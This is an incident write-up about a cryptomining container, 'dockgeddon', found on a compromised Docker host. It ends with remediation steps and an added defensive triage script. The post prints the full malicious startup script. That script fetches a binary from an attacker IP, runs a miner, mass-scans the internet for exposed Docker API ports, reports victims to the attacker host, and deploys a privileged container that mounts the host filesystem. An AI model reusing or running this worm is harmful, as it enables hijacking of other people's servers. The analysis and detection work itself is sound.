Rogue dockgeddon container drives CPU to 100%

Problem description

1. Received a DingTalk alert saying that a machine's CPU usage had exceeded 90%.

2. Then logged in to the monitoring system and found the corresponding machine.

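CPU usage had indeed reached 100%.

3. Checked the container monitoring to determine which container was causing the problem (this machine of mine only runs Docker).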

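If you have no container monitoring, you can also use docker stats to check the resource consumption of each container.

4. Found the offending container, discovered that it was not one of our business containers, and so began analyzing it.

Analyzing the offending container

Looking at the container's startup command showed that on start it runs a script inside the container: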

#!/bin/bash
RATE_TO_SCAN=500000


if type apt-get 2>/dev/null 1>/dev/null; then apt-get update --fix-missing 2>/dev/null 1>/dev/null; apt-get install -y wget curl jq bash masscan libpcap-dev ; fi
if type yum 2>/dev/null 1>/dev/null; then yum clean all 2>/dev/null 1>/dev/null; yum install -y wget curl jq bash masscan libpcap-devel ; fi
if ! type zgrab 2>/dev/null 1>/dev/null; then wget http://45.9.148.85/bin/zgrab -O /usr/bin/zgrab && chmod +x /usr/bin/zgrab ; fi
if ! type docker 2>/dev/null; then curl -sLk https://get.docker.com | bash ; fi
docker stop $(docker ps | grep -v 'CONTAINER' | grep -v 'tntpwner2\|b0rgdrone24\|dockgeddon' | awk '{print $1}')
clear ; echo "" ; echo ""
echo CgoKICAgICAgICBfX19fXyAgICAgICAgICAgICAgICAgICAgX19fX18gICAgX18gIF9fX19fICAgXyBfIF8gICAgICAgICAgICAgIAogICAgICAgL19fICAgXF9fXyAgX18gXyBfIF9fIF9fXy9fXyAgIFwvXCBcIFwvX18gICBcIHwgKF8pIHwgX19fX18gIF9fXyAgCiAgICAgICAgIC8gL1wvIF8gXC8gX2AgfCAnXyBgIF8gXCAvIC9cLyAgXC8gLyAgLyAvXC8gfCB8IHwgfC8gLyBfIFwvIF9ffCAKICAgICAgICAvIC8gfCAgX18vIChffCB8IHwgfCB8IHwgLyAvIC8gL1wgIC8gIC8gLyAgICB8IHwgfCAgIDwgIF9fL1xfXyBcIAogICAgICAgIFwvICAgXF9fX3xcX18sX3xffCB8X3wgfF9cLyAgXF9cIFwvICAgXC8gICAgIHxffF98X3xcX1xfX198fF9fXy8gCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIF8gICBfICAgICAgICAgICAgICBfX18gIF9fXyAgICBfXyAgICBfX18gICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICB8IHxffCB8X18gICBfX18gICAgLyBfX1wvIF8gXCAgL19fXCAgLyBfIFwgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgIHwgX198ICdfIFwgLyBfIFwgIC9fX1wvLyB8IHwgfC8gXC8vIC8gL19cLyAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgfCB8X3wgfCB8IHwgIF9fLyAvIFwvICBcIHxffCAvIF8gIFwvIC9fXFwgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgXF9ffF98IHxffFxfX198IFxfX19fXy9cX19fL1wvIFxfL1xfX19fLyAgICAgICAgICAgICAgICAgCgoKCgoK | base64 -d
sleep 6

chmod +x /usr/bin/zgrab
chmod +x /root/dockerd
chmod +x /root/TNTfeatB0RG

/root/TNTfeatB0RG
nice -n -20 /root/dockerd || /root/dockerd

dAPIpwn(){
range=$1
port=$2
rate=$3
rndstr=$(head /dev/urandom | tr -dc a-z | head -c 6 ; echo '')
eval "$rndstr"="'$(masscan $range -p$port --rate=$rate | awk '{print $6}'| zgrab --senders 200 --port $port --http='/v1.16/version' --output-file=- 2>/dev/null | grep -E 'ApiVersion|client version 1.16' | jq -r .ip)'";

for ipaddy in ${!rndstr}
do

TARGET=$ipaddy:$port

echo '##################################################'
curl -sLk http://45.9.148.85/input/da.php?vuln=$TARGET -o /dev/null
echo $TARGET

timeout -s SIGKILL 240 docker -H $TARGET run -d --net host --privileged --name dockgeddon -v /:/host mangletmpuser/dockgeddon

done
}

while true
do
RANGE=$(curl -sLk http://45.9.148.85/input/da_range.php)".0.0.0/8"
dAPIpwn $RANGE 2375 $RATE_TO_SCAN
dAPIpwn $RANGE 2376 $RATE_TO_SCAN
dAPIpwn $RANGE 2377 $RATE_TO_SCAN
dAPIpwn $RANGE 4244 $RATE_TO_SCAN
dAPIpwn $RANGE 4243 $RATE_TO_SCAN
done

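One look at this startup script and I knew my server was being used by someone else for cryptomining. I eventually found the corresponding information on the Aqua blog.

Excerpt from the blog

TeamTNT has launched a new campaign against Docker and Kubernetes environments. Using a set of container images hosted on Docker Hub, the attackers target misconfigured Docker daemons, Kubeflow dashboards and Weave Scope, exploiting these environments to steal cloud credentials, open backdoors, mine cryptocurrency and launch a worm that looks for the next victim. In this blog, I will explore these container images and what they were designed to do.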

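We were compromised precisely because we had exposed this port to the public internet.

Solution

1. Delete the image

2. Block external access to the sensitive ports listed above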
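
To confirm both steps on a host, here is a triage helper added as an example; it is not part of the original post. It flags containers whose name or image matches the names seen in the startup script above, and reports which of the ports that script probes are listening on a non-loopback address. The function names and the sample data are constructed for illustration.

```shell
#!/bin/bash
# Added example. Indicators are taken from the startup script shown above.
IOC_PATTERN='tntpwner2|b0rgdrone24|dockgeddon'
API_PORTS='2375 2376 2377 4243 4244'

# stdin: lines of "ID IMAGE NAME", e.g. from
#   docker ps -a --format '{{.ID}} {{.Image}} {{.Names}}'
# stdout: IDs of containers whose image or name matches an indicator.
flag_containers() {
    awk -v pat="$IOC_PATTERN" '$2 ~ pat || $3 ~ pat { print $1 }'
}

# stdin: output of `ss -ltnH` (listening TCP sockets, no header)
# stdout: each Docker API port bound to a non-loopback address.
exposed_api_ports() {
    awk -v ports="$API_PORTS" '
        BEGIN { n = split(ports, p, " "); for (i = 1; i <= n; i++) want[p[i]] = 1 }
        {
            addr = $4                          # "Local Address:Port" column
            port = addr; sub(/.*:/, "", port)
            host = addr; sub(/:[0-9]+$/, "", host)
            if (!(port in want)) next          # not a port the script scans for
            if (host ~ /^127\./ || host == "[::1]") next   # loopback only
            print port
        }' | sort -un
}

# Constructed sample input so the helpers can be tried offline.
SAMPLE_PS='a1b2c3d4e5f6 nginx:1.19 web
0f9e8d7c6b5a mangletmpuser/dockgeddon dockgeddon
1122334455aa redis:6 cache'
SAMPLE_SS='LISTEN 0 4096 0.0.0.0:2375 0.0.0.0:*
LISTEN 0 128 127.0.0.1:2376 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 [::]:4243 [::]:*'

echo "suspicious containers:"; printf '%s\n' "$SAMPLE_PS" | flag_containers
echo "exposed API ports:";     printf '%s\n' "$SAMPLE_SS" | exposed_api_ports
```

On a real host, pipe the live `docker ps -a --format ...` and `ss -ltnH` output into the two functions instead of the sample variables; after cleanup both should print nothing.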